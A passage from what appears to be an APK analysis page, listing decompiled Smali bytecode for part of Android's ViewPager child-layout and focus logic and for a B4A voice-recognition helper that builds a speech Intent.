                        299invoke-virtual {v3}, Landroid/view/View;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        300move-result-object v4
                        301check-cast v4, Landroidx/viewpager/widget/ViewPager$LayoutParams;
                        302iput v2, v4, Landroidx/viewpager/widget/ViewPager$LayoutParams;->childIndex:I
                        303iget-boolean v5, v4, Landroidx/viewpager/widget/ViewPager$LayoutParams;->isDecor:Z
                        304if-nez v5, :cond_1cf
                        305iget v5, v4, Landroidx/viewpager/widget/ViewPager$LayoutParams;->widthFactor:F
                        306cmpl-float v5, v5, v9
                        307if-nez v5, :cond_1cf
                        309invoke-virtual {v0, v3}, Landroidx/viewpager/widget/ViewPager;->infoForChild(Landroid/view/View;)Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        310move-result-object v3
                        311if-eqz v3, :cond_1cf
                        312iget v5, v3, Landroidx/viewpager/widget/ViewPager$ItemInfo;->widthFactor:F
                        313iput v5, v4, Landroidx/viewpager/widget/ViewPager$LayoutParams;->widthFactor:F
                        314iget v3, v3, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        315iput v3, v4, Landroidx/viewpager/widget/ViewPager$LayoutParams;->position:I
                        316cond_1cf: add-int/lit8 v2, v2, 0x1
                        317goto/16 :goto_1a9
                        318cond_1d2:
                        319invoke-direct/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->sortChildDrawingOrder()V
                        321invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->hasFocus()Z
                        322move-result v1
                        323if-eqz v1, :cond_211
                        325invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->findFocus()Landroid/view/View;
                        326move-result-object v1
                        327if-eqz v1, :cond_1e6
                        329invoke-virtual {v0, v1}, Landroidx/viewpager/widget/ViewPager;->infoForAnyChild(Landroid/view/View;)Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        330move-result-object v3
                        331goto/16 :goto_1e7
                        332cond_1e6: const/4 v3, 0x0
                        333goto_1e7: if-eqz v3, :cond_1ef
                        334iget v1, v3, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        335iget v2, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        336if-eq v1, v2, :cond_211
                        337cond_1ef: const/4 v5, 0x0
                        338goto_1f0:
                        339invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getChildCount()I
                        340move-result v1
                        341if-ge v5, v1, :cond_211
                        343invoke-virtual {v0, v5}, Landroidx/viewpager/widget/ViewPager;->getChildAt(I)Landroid/view/View;
                        344move-result-object v1
                        346invoke-virtual {v0, v1}, Landroidx/viewpager/widget/ViewPager;->infoForChild(Landroid/view/View;)Landroidx/viewpager/widget/ViewPager$ItemInfo;
                        347move-result-object v2
                        348if-eqz v2, :cond_20e
                        349iget v2, v2, Landroidx/viewpager/widget/ViewPager$ItemInfo;->position:I
                        350iget v3, v0, Landroidx/viewpager/widget/ViewPager;->mCurItem:I
                        351if-ne v2, v3, :cond_20e
                        352const/4 v2, 0x2
                        354invoke-virtual {v1, v2}, Landroid/view/View;->requestFocus(I)Z
                        355move-result v1
                        356if-eqz v1, :cond_20e
                        357goto/16 :goto_211
                        358cond_20e: add-int/lit8 v5, v5, 0x1
                        359goto/16 :goto_1f0
                        360cond_211: return-void
                        361cond_212:
                        362invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getResources()Landroid/content/res/Resources;
                        363move-result-object v1
                        365invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getId()I
                        366move-result v2
                        368invoke-virtual {v1, v2}, Landroid/content/res/Resources;->getResourceName(I)Ljava/lang/String;
                        369move-result-object v1
                        370try_end_21e: goto/16 :goto_227
                        371catch_21f:
                        372invoke-virtual/range {p0 .. p0}, Landroidx/viewpager/widget/ViewPager;->getId()I
                        373move-result v1
                        375invoke-static {v1}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        376move-result-object v1
                        377goto_227: new-instance v2, Ljava/lang/IllegalStateException;
                        378new-instance v3, Ljava/lang/StringBuilder;
                        380invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        382const-string v4, "The application\'s PagerAdapter changed the adapter\'s contents without calling PagerAdapter#notifyDataSetChanged! Expected adapter item count: "
                        384invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        385iget v4, v0, Landroidx/viewpager/widget/ViewPager;->mExpectedAdapterCount:I
                        387invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        389const-string v4, ", found: "
                        391invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        393invoke-virtual {v3, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        395const-string v4, " Pager id: "
                        397invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        399invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        401const-string v1, " Pager class: "
                        403invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        405invoke-virtual/range {p0 .. p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        406move-result-object v1
                        408invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        410const-string v1, " Problematic adapter: "
                        412invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        414iget-object v1, v0, Landroidx/viewpager/widget/ViewPager;->mAdapter:Landroidx/viewpager/widget/PagerAdapter;
                        416invoke-virtual {v1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        417move-result-object v1
                        419invoke-virtual {v3, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        421invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        422move-result-object v1
                        424invoke-direct {v2, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        425goto/16 :goto_26b
                        426goto_26a: throw v2
                        427goto_26b: goto/16 :goto_26a
                        Cross References
                        APIs
                        • java.lang.String.length
                        • android.content.Intent.putExtra
                        • java.lang.String.length
                        • android.content.Intent.putExtra
                        Strings
                        • android.speech.extra.PROMPT
                        • android.speech.extra.LANGUAGE
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lanywheresoftware/b4a/phone/Phone$VoiceRecognition;->prompt:Ljava/lang/String;
                        2if-eqz v0, :cond_11
                        4invoke-virtual {v0}, Ljava/lang/String;->length()I
                        5move-result v0
                        6if-lez v0, :cond_11
                        8iget-object v0, p0, Lanywheresoftware/b4a/phone/Phone$VoiceRecognition;->prompt:Ljava/lang/String;
                        10const-string v1, "android.speech.extra.PROMPT"
                        12invoke-virtual {p2, v1, v0}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        13cond_11:
                        14iget-object v0, p0, Lanywheresoftware/b4a/phone/Phone$VoiceRecognition;->language:Ljava/lang/String;
                        15if-eqz v0, :cond_22
                        17invoke-virtual {v0}, Ljava/lang/String;->length()I
                        18move-result v0
                        19if-lez v0, :cond_22
                        21iget-object v0, p0, Lanywheresoftware/b4a/phone/Phone$VoiceRecognition;->language:Ljava/lang/String;
                        23const-string v1, "android.speech.extra.LANGUAGE"
                        25invoke-virtual {p2, v1, v0}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        26cond_22: new-instance v0, Lanywheresoftware/b4a/phone/Phone$VoiceRecognition$1;
                        28invoke-direct {v0, p0, p1}, Lanywheresoftware/b4a/phone/Phone$VoiceRecognition$1;-><init>(Lanywheresoftware/b4a/phone/Phone$VoiceRecognition;Lanywheresoftware/b4a/BA;)V
                        29iput-object v0, p0, Lanywheresoftware/b4a/phone/Phone$VoiceRecognition;->ion:Lanywheresoftware/b4a/IOnActivityResult;
                        31invoke-virtual {p1, v0, p2}, Lanywheresoftware/b4a/BA;->startActivityForResult(Lanywheresoftware/b4a/IOnActivityResult;Landroid/content/Intent;)V
                        32return-void